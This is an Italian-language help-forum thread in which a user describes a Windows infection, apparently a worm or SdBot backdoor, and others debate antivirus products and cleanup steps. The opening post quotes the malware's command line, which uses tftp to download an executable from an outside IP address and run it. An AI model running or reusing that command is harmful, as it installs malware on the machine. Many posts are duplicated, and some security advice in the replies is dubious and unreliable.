Salve ragazzi.....sottopongo ai più il quesito prima di ricorrere alle maniere forti con il mio pc (formattare :mad: )
Lavoro tranquillamente quando all'improvviso la finestra "esegui" si attiva con la seguente istruzione: "%comspec% /c tftp -i 68.43.148.121 GET zkbagzd.exe & start zkbagzd".
Panico....successivamente si apre il prompt di ms-dos con il file cmd.exe che si avvia bloccato prontamente dall'antivirus Nod32.
Cosa sarà mai? il mio intuito mi dice che quella istruzione serva a far avviare il file zkbagzd.exe richiesto da quell'ip.
In realtà il suddetto file non esiste nel pc....forse l'antivirus lo avrà eliminato?
Nel file dei rapporti del Nod32 mi indica che ha posto in quarantena il file "tftp2448 oppure tftp3478 ecc...."che è probabilmente un virus sconosciuto ed è causato dal file tftp.exe.
quali i rimedi possibili?
grazie a quanti mi aiuteranno

N.B.:ricordo che il file tftp è un file di sistema quindi non serve cancellarlo dal pc!

complimenti per esser stato infettato da
Cycle.worm.a
scaricati kasperksy antivirus 6 in trial leva nod e fai un bel passaggio dopo l'aggiornamento

complimenti per esser stato infettato da
Cycle.worm.a
scaricati kasperksy antivirus 6 in trial leva nod e fai un bel passaggio dopo l'aggiornamento

Ok....opero e ti faccio sapere...
Ps: cacchio allora questo Nod32 non vale una cippalippa?

Ok....opero e ti faccio sapere...
Ps: cacchio allora questo Nod32 non vale una cippalippa?

con i virus subdoli il kas è l'unico che compente

Ok....opero e ti faccio sapere...
Ps: cacchio allora questo Nod32 non vale una cippalippa?

Il Nod32 non è una cippalippa come dici tu. Chissà cosa hai scaricato o in quale sito sei andato...
Nessun antivirus rimuove tutti i virus dobbiamo collaborare anche noi a tenere il pc protetto ad esempio evitando di andare su siti bancari,casinò,porno...
Comunque sul pc non basta solo un antivirus ma ci vuole anche un antispyware,antiadware e un firewall per proteggersi come minimo

P.S. Scusa hai il service pack 2?

Il Nod32 non è una cippalippa come dici tu. Chissà cosa hai scaricato o in quale sito sei andato...
Nessun antivirus rimuove tutti i virus dobbiamo collaborare anche noi a tenere il pc protetto ad esempio evitando di andare su siti bancari,casinò,porno...
Comunque sul pc non basta solo un antivirus ma ci vuole anche un antispyware,antiadware e un firewall per proteggersi come minimo

P.S. Scusa hai il service pack 2?

Allora...ti dico....no siti porno,no siti bancari....solo portali ben noti a tutti ed email scaricate senza nulla di strano....il pc è di 1 mese circa quindi niente dubbi sulla sospetta navigazione in siti poco raccomandabili.....lo avevo destinato proprio ad una navigazione sicura.....(siti vbancari ecc....fortuna che non avevo fatto ancora nessun accesso alla mia banca!!!!!!!!!!) fornito di windows defendere, firewall del router e mi crosoft antispiware ecc....cmq il nod32 blokkava il predetto virus ad un certo punto giusto?quindi posso stare tranquillo sul fatto che il virus non completava la sua azione???solo che non lo debellava....e questo è un grave difetto dell'antivirus.....dovrò tornare ad avast????forse sì aggiungendo un banco da 1 gb di ram!!!!infatti è peggio di un vampiro di ram!!!!
cmq applico e ti faccio sapere....il pc è in remoto collegato all'ufficio....
Ps: vorrei tanto sapere qual era lo scopo di questo bast..... di worm!!!:muro:

Allora...ti dico....no siti porno,no siti bancari....solo portali ben noti a tutti ed email scaricate senza nulla di strano....il pc è di 1 mese circa quindi niente dubbi sulla sospetta navigazione in siti poco raccomandabili.....lo avevo destinato proprio ad una navigazione sicura.....(siti vbancari ecc....fortuna che non avevo fatto ancora nessun accesso alla mia banca!!!!!!!!!!) fornito di windows defendere, firewall del router e mi crosoft antispiware ecc....cmq il nod32 blokkava il predetto virus ad un certo punto giusto?quindi posso stare tranquillo sul fatto che il virus non completava la sua azione???solo che non lo debellava....e questo è un grave difetto dell'antivirus.....dovrò tornare ad avast????forse sì aggiungendo un banco da 1 gb di ram!!!!infatti è peggio di un vampiro di ram!!!!
cmq applico e ti faccio sapere....il pc è in remoto collegato all'ufficio....
Ps: vorrei tanto sapere qual era lo scopo di questo bast..... di worm!!!:muro:

non mi sorprende che con defender e un firewall senza controllo in uscita non te lo abbiano preso :rolleyes:
si av free ti consiglio avs che è il fratello minore del kasperksy

non mi sorprende che con defender e un firewall senza controllo in uscita non te lo abbiano preso :rolleyes:
si av free ti consiglio avs che è il fratello minore del kasperksy

Io invece te lo sconsiglio active virus shield (fratello minore del kaspersky) perchè anche avendo una buona rilevazione dei virus non ha il web antivirus cosa che è IMPORTANTISSIMA

Io invece te lo sconsiglio active virus shield (fratello minore del kaspersky) perchè anche avendo una buona rilevazione dei virus non ha il web antivirus cosa che è IMPORTANTISSIMA

e trovamene uno free e potente che ce l'abbia

e trovamene uno free e potente che ce l'abbia

Non sono buoni gli antivirus a pagamento figuriamoci quelli free :rolleyes:
Comunque ogni antivirus free ha qualche problema altrimenti non sarebbero gratuiti.

Non sono buoni gli antivirus a pagamento figuriamoci quelli free :rolleyes:
Comunque ogni antivirus free ha qualche problema altrimenti non sarebbero gratuiti.

avast è l'unico che ha lo scanner web; ma personalmente tanto vale resti al nod32; almeno ha la leggerezza e l'euristica;

Io con nod32 mi trovo benissimo e giro anche sui siti poco raccomandabili che dite voi.
L'importante è affiancarci un ottimo firewall (io uso zonealarm) e un ottimo antispyware, il vecchio ewido ora avg antispyware è veramente efficace.
Mai avuto nessun problema di troian ecc... cmq controllare ogni tanto anche con adaware e spyboat non fa mai male.... ricordatevi sempre anche di controllare cosa avvia il sistema automaticamente.

Allora...ti dico....no siti porno,no siti bancari....solo portali ben noti a tutti ed email scaricate senza nulla di strano....il pc è di 1 mese circa quindi niente dubbi sulla sospetta navigazione in siti poco raccomandabili.....lo avevo destinato proprio ad una navigazione sicura.....(siti vbancari ecc....fortuna che non avevo fatto ancora nessun accesso alla mia banca!!!!!!!!!!) fornito di windows defendere, firewall del router e mi crosoft antispiware ecc....cmq il nod32 blokkava il predetto virus ad un certo punto giusto?quindi posso stare tranquillo sul fatto che il virus non completava la sua azione???solo che non lo debellava....e questo è un grave difetto dell'antivirus.....dovrò tornare ad avast????forse sì aggiungendo un banco da 1 gb di ram!!!!infatti è peggio di un vampiro di ram!!!!
cmq applico e ti faccio sapere....il pc è in remoto collegato all'ufficio....
Ps: vorrei tanto sapere qual era lo scopo di questo bast..... di worm!!!:muro:


guarda anch io uso nod32 da qualche mese su un portatile certo che paragonare nod32 a avast mi sembra una bestemmia,comunque nod3 come ogni antivirus è strutturato in maniera che l utente possa configurarlo alle proprie esigenze quindi esistono le opzioni.Se nod32 ti ha trovato un operazione sospetta e te la messa in quarantena vuol dire che nelle opzioni sul da farsi è spuntato così se volevi eliminarlo direttamente potevi spuntare diversamente l opzione però non avresti potuto esaminarlo al meglio o al limite spedirlo ai laboratori nod32 per studiarlo fidati non paragonare più nod32 a avast che è una bestemmia..volevo specificare come ultima cosa che nod32 svetta nelle alte classifiche dei antivirus più sofisticati mentre avast è non il penultimo ma l ultimo in tutte le classifiche degne di questa nomea

e comunque più che un vero virus si tratti di una vera e propria Backdoor:IRC/SdBot.dam Backdoor=porta aperta per chi vuole entrare nel tuo pc a tua insaputa e rubarti dati protetti come giustamente hai il timore dati bancari etc etc quindi nod32 ha fatto più del suo compito per il quale è stato creato

e comunque più che un vero virus si tratti di una vera e propria Backdoor:IRC/SdBot.dam Backdoor=porta aperta per chi vuole entrare nel tuo pc a tua insaputa e rubarti dati protetti come giustamente hai il timore dati bancari etc etc quindi nod32 ha fatto più del suo compito per il quale è stato creato

sono daccrto con te cmq fidatevi i sistemi bancari sono molto sicuri di solito è l'utente a fare danno abboccando al fishing.
Cmq acquista avg antispyware e vedi che poi non avrai più problemi con trojan, li blocca tutti in tempo reale.:cool:

sono daccrto con te cmq fidatevi i sistemi bancari sono molto sicuri di solito è l'utente a fare danno abboccando al fishing.
Cmq acquista avg antispyware e vedi che poi non avrai più problemi con trojan, li blocca tutti in tempo reale.:cool:

il risultato è lo stesso!!!!il file viene individuato cancellato ma non disinfettato!in sostanza al riavvio del pc sono punto e a capo....quindi nod32=avast=kasper.....ahimè domani formatto tutto....

il risultato è lo stesso!!!!il file viene individuato cancellato ma non disinfettato!in sostanza al riavvio del pc sono punto e a capo....quindi nod32=avast=kasper.....ahimè domani formatto tutto....

devi controllare le voci di startup.
fai anche una scansione con hjiack

il risultato è lo stesso!!!!il file viene individuato cancellato ma non disinfettato!in sostanza al riavvio del pc sono punto e a capo....quindi nod32=avast=kasper.....ahimè domani formatto tutto....

hai disattivato il restore system?magari questa fogna si è assimilato un file di sistema per questo non te lo fa modificare perchè indispensabile al sistema

hai disattivato il restore system?magari questa fogna si è assimilato un file di sistema per questo non te lo fa modificare perchè indispensabile al sistema

scusate ma il file c/windows/system32/tftp.exe è un file di sistema o non serve ad una mazza?controllate nei vostri pc!